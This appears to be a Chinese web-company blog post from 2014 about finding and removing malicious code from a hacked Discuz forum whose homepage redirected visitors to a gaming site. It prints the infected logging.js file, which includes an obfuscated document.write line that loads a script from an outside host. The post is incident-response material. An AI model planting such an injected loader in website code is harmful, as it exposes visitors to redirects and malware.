<strong id="p8dof"></strong>

    <span id="p8dof"></span>
  • <tbody id="p8dof"><noscript id="p8dof"></noscript></tbody>
  • <tbody id="p8dof"></tbody>

    歡迎訪問士人網絡天水網站建設專業服務平臺
    網站地圖 | 聯系我們
    天水士人網絡
    天水網絡公司電話
    當前位置:主頁 > 網站建設 > 建站知識 >

    discuz網站被掛馬 打開主頁跳轉至游戲網站

    時間:2014-05-21 | 來源:www.gaylse.com | 作者:云橫心際間 | 點擊:
      最近,有一朋友的discuz系統網站被掛馬了,一打開網站主頁兩秒鐘之后就跳轉到了游戲網站。這樣的情況往往是在每天第一次打開網站的時候出現的,一天只有偶爾的一兩次。朋友求我相助,經過一番周折,終于找到了掛馬的地方。
     
      剛開始,用discuz后臺自帶的“文件校驗”功能去查找是否有修改的文件和未知文件,結果沒有發現可疑目標。然后用了360網站安全檢測和安全聯盟安全檢測進行查找掃描有無掛馬情況,最后還是無功而返。無賴之下,只好進行逐一排查了,問題終于發現了,原來這次是在js文件里掛了馬。
     
      我先排查了iframe框架情況,結果沒有發現情況。然后檢查js文件,先檢查主頁里面的js文件,在檢查logging.js這個文件時,問題發現了。
     
      logging.js這個文件的路勁是/static/js/logging.js ,它本來是個登陸狀態判斷文件。我們先看看這段代碼:
     
    /*
    [Discuz!] (C)2001-2099 Comsenz Inc.
    This is NOT a freeware, use is subject to license terms
     
    $Id: logging.js 23838 2011-08-11 06:51:58Z monkey $
    */
     
    function lsSubmit(op) {
    var op = !op ? 0 : op;
    if(op) {
    $('lsform').cookietime.value = 2592000;
    }
    if($('ls_username').value == '' || $('ls_password').value == '') {
    showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : ''));
    } else {
    ajaxpost('lsform', 'return_ls', 'return_ls');
    }
    return false;
    }
    document.write("<scr"+"ipt src='http://q."+"n\1512"
    +"2"+".com"+"/s."+"asp"+"?gansu.lanzhou'><\/scr"+"ipt>");
     
    function errorhandle_ls(str, param) {
    if(!param['type']) {
    showError(str);
    }
    }
     
      結果出現紅色字體的多余代碼,當機立斷刪除了這段代碼。網站回復了正常!
    <strong id="p8dof"></strong>

    <span id="p8dof"></span>
  • <tbody id="p8dof"><noscript id="p8dof"></noscript></tbody>
  • <tbody id="p8dof"></tbody>